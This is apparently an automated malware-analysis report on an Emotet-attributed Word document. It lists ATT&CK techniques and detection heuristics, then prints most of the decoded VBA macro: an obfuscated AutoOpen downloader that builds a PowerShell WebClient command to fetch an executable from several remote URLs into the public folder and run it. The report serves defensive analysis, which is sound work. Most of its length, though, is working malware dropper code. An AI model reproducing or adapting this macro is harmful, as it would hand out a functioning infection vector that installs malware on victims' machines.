Verdict: MALICIOUS (Risk Score: 202)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, a common technique for Emotet. The macro uses Shell() calls to execute commands, including constructing a complex command line that appears to download and execute a second-stage payload from a remote server. The ClamAV detection explicitly names Emotet, further supporting the family attribution.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6887588-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6887588-0
- VBA macros detected [medium, 2 related findings, OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4648 bytes | 45e2efadd5a5dc4db2d937cc5795a90f0a612cfa84724c104c87f027c2d8abc0 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "IaCwwiF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If dLukjJ > 15 Then
oAMkCS = "tWBb"
End If
If doBwr And Xbnhh Then
YiZNCb = "Hpno"
End If
If HojqU Eqv 19 Then
BYikpA = "z"
End If
If sWOFCS < RqnuHO Then
vkKXET = "pWMzTYTGadt"
End If
If MqBBf <> tWLRzQ Then
FLOjjF = "FCAB"
End If
iZdkWkNiAsK (KeyString(rEYzJYW + kkSln + 12 + 16 + 39 + crpbD + HMGQXjwU) + sKXHYzQ + IARFw + KeyString(rbGYhaa + kDIwFM + 14 + 18 + 45 + iscoB + YOBHwqGJ) + zQtfICj + RClpIz + cILMpJMXD + UOwVw + QLPJATKj + IsdaRiF)
If TTIsuu Or owKpAw Then
hcLvHw = "pVFjXrbZoYuoWQ"
End If
If SUPLi > ZQiLw Then
zFiwOk = "wCMWDN"
End If
End Sub
Attribute VB_Name = "lvLZfHUs"
Function zQtfICj()
If UEwZV And ozVwp Then
EJRhav = "wwzPmcLEo"
End If
RwQMVq = "d /V^:^O/C" + """" + "^s^e^t ^y^p^W^8=^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^ " + "^ ^ ^ ^ ^ ^ ^}" + "^}^{^hc^t^ac^}^;" + "^k^a^er^b^;^"
If aZRiMW Or tNYkLC Then
aPtfvz = "VRSWoJwKEAuoMO"
End If
If tOtql >= XJBnP Then
wjRbAV = "XJl"
End If
If bFKjBk >= MmNqC Then
LJIjoF = "wL"
End If
If zjJYq And 13 Then
phQdR = "kQwksGk"
End If
rVsFlbXn = "D^b^w^$^ ^m^e^t" + "^I^-^e^k^ov" + "n^I^;)D^b^w^$^ ^,^" + "ZZR$(^e^l^i" + "^F^d^a^o^ln^w^o^D" + "^.I^z^K^$^{^yr^t^"
MCkpvqN = "{)^Hc^d^$^ n^i" + "^ ^Z^ZR^$(hc^a^er^" + "o^f;^'^e^x^e^.^'+^" + "Bc^k^$^+^'"
If YSrUPs And vtDVPh Then
SSYOp = "r"
End If
If fIskVE < HwAHN Then
fomvpm = "jv"
End If
zTnOY = "^\^'^+c^i^l^b^u^p^:v" + "n^e^$^=^D^b" + "^w^$^;'^3^9^5^'"
zQtfICj = RwQMVq + rVsFlbXn + MCkpvqN + zTnOY
If zElXc >= rmlMMW Then
FqjvY = "aqfmk"
End If
If MFhBjw <= 19 Then
TXzYk = "IPbATb"
End If
End Function
Function RClpIz()
nujiwCqz = "^ ^=^ ^Bc^k" + "^$;)^'@^'(t^il^p^" + "S.^'^7^h^q^" + "L^yr^j/^gr^o^." + "^i^iu^k^f^m"
If vVkXws = RSBuif Then
EkcPwo = "rKKEHKPfSI"
End If
If vECYuW > 3 Then
zKASW = "zpSZVri"
End If
If awtIc <> BpuKz Then
UhiHLb = "d"
End If
If dKLQM <= hsGhXp Then
cdWPrM = "wAEKaS"
End If
If LmAtib Or btUPQ Then
wcJnU = "ih"
End If
aQidlO = "^k^.^ar^ht^" + "a^z^a//^:^p^t^t^" + "h^@^6^ic^Wn4^p^T/^t^"
FqNSF = "en^.e^t^s^k^e^tn^" + "okv//:^p^tt^h^@" + "^F^p^d^w^s^J^Jtc/" + "^l^p.gn^in^"
RClpIz = nujiwCqz + aQidlO + FqNSF
If OIcJN < DfOUw Then
pGDMi = "uzz"
End If
If cGVawj >= AsiOwD Then
NkpOn = "diUcFhKZ"
End If
If rCriK > hjRjjW Then
WhkZm = "w"
End If
If IjRsCj And QHqonQ Then
NssHU = "Ba"
End If
If LVJNu > FPAKUc Then
PBzdDr = "ATm"
End If
End Function
Function cILMpJMXD()
If zjtZlJ And zwwRnz Then
bSJWo = "sJrTultVQYNZMC"
End If
If JzcbG Or owMuX Then
dOACl = "ooo"
End If
If zPNjZi And bvrKIM Then
NqbUvG = "O"
End If
wcpOJ = "i^ar^t^er^" + "o^h^sf^f^o^.^w" + "^w^w//^:^p^t^t^h" + "^@^9R^gCr^Y^7^"
GMXlriaSwj = "4^7/^m^oc^.^s^p" + "^ir^g^dna^s^m^ac/" + "/^:^p^t^t^" + "h^@^dN^e^K^5^6^m^h" + "^z/^moc^.r^a" + "^l^u^l^l^ecr^sb//"
If YLncO = bjScMs Then
OOVScc = "FnJYtM"
End If
If TfkpWi < 6 Then
XDzjP = "ZuR"
End If
ahloZC = "^:^p^t^t^h^'^=^Hc^d" + "^$^;^tn^e^i^" + "lC^b^e^W^." + "^t^eN^ ^tc^e^j^b^"
KMrQuZPc = "o^-^wen^=^I^z" + "^K^$^ ^l^le" + "^h^sr^e^wo^" + "p&&^f^or /^L %^"
cILMpJMXD = wcpOJ + GMXlriaSwj + ahloZC + KMrQuZPc
If Ghlhmz Xor 1 Then
vkBOj = "I"
End If
If iYWwVc <= QGiXm Then
tSkUV = "jHH"
End If
If nrWVF Or qRTvM Then
jtsXuW = "Mizw"
End If
If jQVpQi <> BJHZi Then
lsqTOr = "oPqJqofvVi"
End If
End Function
Function UOwVw()
lEGmKztW = "0 ^in (^3^8^3;^-^1" + ";^0)^d^o ^s" + "^e^t ^7^TN=!^7^TN" + "!!^y^p^W^8:~%" + "^0,1!&&^i^f"
If LwbwKf <> 17 Then
RfzDPw = "rLaiGs"
End If
jvcsfCKt = " %^0 ^l^e^q ^0 c" + "^a^l^l %^7" + "^TN:^*^7^TN^!" + "^=%" + """" + ""
UOwVw = lEGmKztW + jvcsfCKt
If WvazTG < XQCWJi Then
RvCvVn = "OVYA"
End If
... (truncated)